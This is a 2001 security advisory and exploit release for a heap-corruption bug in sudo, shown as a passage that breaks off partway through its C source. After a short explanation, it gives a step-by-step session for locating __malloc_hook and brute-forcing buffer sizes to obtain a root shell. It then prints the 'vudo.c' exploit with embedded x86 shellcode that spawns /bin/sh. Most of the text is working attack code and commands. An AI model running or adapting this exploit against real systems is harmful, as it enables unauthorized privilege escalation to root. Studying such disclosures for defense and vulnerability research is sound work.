-[ Vudo - An object superstitiously believed to embody magical powers ]---------------[ Michel "MaXX" Kaempf <maxx@synnergy.net> ]------------------------------[ Copyright (C) 2001 Synnergy Networks ]------------------[ 0x00 - Introduction ]-----------------------------------------------Sudo (superuser do) allows a system administrator to give certain users(or groups of users) the ability to run some (or all) commands as rootor another user while logging the commands and arguments.-- http://www.courtesan.com/sudo/index.htmlOn February 19, 2001, Sudo version 1.6.3p6 was released: "This fixesa potential security problem. So far, the bug does not appear to beexploitable." Despite the comments sent to various security mailinglists after the announce of the new Sudo version, the bug is not abuffer overflow and the bug does not damage the stack.But the bug is exploitable: even a single byte located somewhere in theheap, erroneously overwritten by a NUL byte before a call to syslog(3)and immediately restored after the syslog(3) call, may actually lead toexecution of code as root. A working exploit for Red Hat Linux/Intel 6.2(Zoot) sudo-1.6.1-1 is attached at the end of this email and a completeresearch paper on this issue and on general heap corruption techniqueswill be released soon.This research paper will focus on Linux/Intel systems and will:- detail the Sudo bug and explain why a precise knowledge of how mallocworks internally is needed in order to exploit it;- describe the functioning of the memory allocator used by the GNU CLibrary (Doug Lea's Malloc) from the attacker's point of view;- apply this information to the Sudo bug and present four theoreticaltechniques to exploit it;- demonstrate how one of these methods can be implemented in practice inorder to gain root privileges.I did not plan to publish the exploit without the paper but a discussionof the Sudo vulnerability started on the vuln-dev mailing list and Iwanted to share the Vudo exploit with the security community. Stay tunedfor the complete research paper soon...--[ 0x01 - Exploit ]----------------------------------------------------In order to successfully gain root privileges via the Vudo exploit, auser does not necessarily need to be present in the sudoers file, buthas to know their user password. They need additionally to provide threecommand line arguments:- the address of the __malloc_hook function pointer, which varies fromone system to another but can be determined;- the size of the tz buffer, which varies slightly from one system toanother and has to be brute forced;- the size of the envp buffer, which varies slightly from one system toanother and has to be brute forced.A typical Vudo cult^H^H^H^Hsession starts with an authentication step,a __malloc_hook computation step, and eventually a brute force step,based on the tz and envp examples provided by the Vudo usage message(fortunately the user does not need to provide their password each timeSudo is executed during the brute force step because they authenticatedright before):$ /usr/bin/sudo www.MasterSecuritY.frPassword:maxx is not in the sudoers file.  This incident will be reported.$ LD_TRACE_LOADED_OBJECTS=1 /usr/bin/sudo | grep /lib/libc.so.6        libc.so.6 => /lib/libc.so.6 (0x00161000)$ nm /lib/libc.so.6 | grep __malloc_hook000ef1dc W __malloc_hook$ perl -e 'printf "0x%08x\n", 0x00161000 + 0x000ef1dc'0x002501dc$ for tz in `seq 62587 8 65531`> do> for envp in `seq 6862 2 6874`> do> ./vudo 0x002501dc $tz $envp> done> donemaxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.bash#/* * vudo.c versus Red Hat Linux/Intel 6.2 (Zoot) sudo-1.6.1-1 * Copyright (C) 2001 Michel "MaXX" Kaempf <maxx@synnergy.net> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or (at * your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * USA */#include <limits.h>#include <paths.h>#include <pwd.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/types.h>#include <unistd.h>typedef struct malloc_chunk {    size_t prev_size;    size_t size;    struct malloc_chunk * fd;    struct malloc_chunk * bk;} * mchunkptr;#define SIZE_SZ sizeof(size_t)#define MALLOC_ALIGNMENT ( SIZE_SZ + SIZE_SZ )#define MALLOC_ALIGN_MASK ( MALLOC_ALIGNMENT - 1 )#define MINSIZE sizeof(struct malloc_chunk)/* shellcode */#define sc \    /* jmp */ \    "\xeb\x0appssssffff" \    /* setuid */ \    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" \    /* setgid */ \    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" \    /* execve */ \    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \    "\x80\xe8\xdc\xff\xff\xff/bin/sh"#define MAX_UID_T_LEN 10#define MAXSYSLOGLEN 960#define IFCONF_BUF r2s( 8200 )#define SUDOERS_FP r2s( 176 )#define VASPRINTF r2s( 6300 )#define VICTIM_SIZE r2s( 1500 )#define SUDO "/usr/bin/sudo"#define USER_CWD "/"#define MESSAGE 19 /* "command not allowed" or "user NOT in sudoers" */#define USER_ARGS ( VASPRINTF - VICTIM_SIZE - SIZE_SZ - 1 - (MAXSYSLOGLEN+1) )#define PREV_SIZE 0x5858614d#define SIZE r2s( 192 )#define SPACESPACE 0x08072020#define POST_PS1 ( r2s(16) + r2s(640) + r2s(400) )#define BK ( SPACESPACE - POST_PS1 + SIZE_SZ - sizeof(sc) )#define STACK ( 0xc0000000 - 4 )#define PRE_SHELL "SHELL="#define MAXPATHLEN 4095#define SHELL ( MAXPATHLEN - 1 )#define PRE_SUDO_PS1 "SUDO_PS1="#define PRE_TZ "TZ="#define LIBC "/lib/libc.so.6"#define TZ_FIRST ( MINSIZE - SIZE_SZ - 1 )#define TZ_STEP ( MALLOC_ALIGNMENT / sizeof(char) )#define TZ_LAST ( 0x10000 - SIZE_SZ - 1 )#define POST_IFCONF_BUF ( r2s(1600)+r2s(40)+r2s(16386)+r2s(3100)+r2s(6300) )#define ENVP_FIRST ( ((POST_IFCONF_BUF - SIZE_SZ) / sizeof(char *)) - 1 )#define ENVP_STEP ( MALLOC_ALIGNMENT / sizeof(char *) )/* request2size() */size_tr2s( size_t request ){    size_t size;    size = request + ( SIZE_SZ + MALLOC_ALIGN_MASK );    if ( size < (MINSIZE + MALLOC_ALIGN_MASK) ) {        size = MINSIZE;    } else {        size &= ~MALLOC_ALIGN_MASK;    }    return( size );}/* nul() */intnul( size_t size ){    char * p = (char *)( &size );    if ( p[0] == '\0' || p[1] == '\0' || p[2] == '\0' || p[3] == '\0' ) {        return( -1 );    }    return( 0 );}/* nul_or_space() */intnul_or_space( size_t size ){    char * p = (char *)( &size );    if ( p[0] == '\0' || p[1] == '\0' || p[2] == '\0' || p[3] == '\0' ) {        return( -1 );    }    if ( p[0] == ' ' || p[1] == ' ' || p[2] == ' ' || p[3] == ' ' ) {        return( -1 );    }    return( 0 );}typedef struct vudo_s {    /* command line */    size_t __malloc_hook;    size_t tz;    size_t envp;    size_t setenv;    size_t msg;    size_t buf;    size_t NewArgv;    /* execve */    char ** execve_argv;    char ** execve_envp;} vudo_t;/* vudo_setenv() */size_tvudo_setenv( uid_t uid ){    struct passwd * pw;    size_t setenv;    char idstr[ MAX_UID_T_LEN + 1 ];    /* pw */    pw = getpwuid( uid );    if ( pw == NULL ) {        return( 0 );    }    /* SUDO_COMMAND */    setenv = r2s( 16 );    /* SUDO_USER */    setenv += r2s( strlen("SUDO_USER=") + strlen(pw->pw_name) + 1 );    setenv += r2s( 16 );    /* SUDO_UID */    sprintf( idstr, "%ld", (long)(pw->pw_uid) );    setenv += r2s( strlen("SUDO_UID=") + strlen(idstr) + 1 );    setenv += r2s( 16 );    /* SUDO_GID */    sprintf( idstr, "%ld", (long)(pw->pw_gid) );    setenv += r2s( strlen("SUDO_GID=") + strlen(idstr) + 1 );    setenv += r2s( 16 );    return( setenv );}/* vudo_msg() */size_tvudo_msg( vudo_t * p_v ){    size_t msg;    msg = ( MAXSYSLOGLEN + 1 ) - strlen( "shell " ) + 3;    msg *= sizeof(char *);    msg += SIZE_SZ - IFCONF_BUF + p_v->setenv + SUDOERS_FP + VASPRINTF;    msg /= sizeof(char *) + 1;    return( msg );}/* vudo_buf() */size_tvudo_buf( vudo_t * p_v ){    size_t buf;    buf = VASPRINTF - VICTIM_SIZE - p_v->msg;    return( buf );}/* vudo_NewArgv() */size_tvudo_NewArgv( vudo_t * p_v ){    size_t NewArgv;    NewArgv = IFCONF_BUF - VICTIM_SIZE - p_v->setenv - SUDOERS_FP - p_v->buf;    return( NewArgv );}/* vudo_execve_argv() */char **vudo_execve_argv( vudo_t * p_v ){    size_t pudding;    char ** execve_argv;    char * p;    char * user_tty;    size_t size;    char * user_runas;    int i;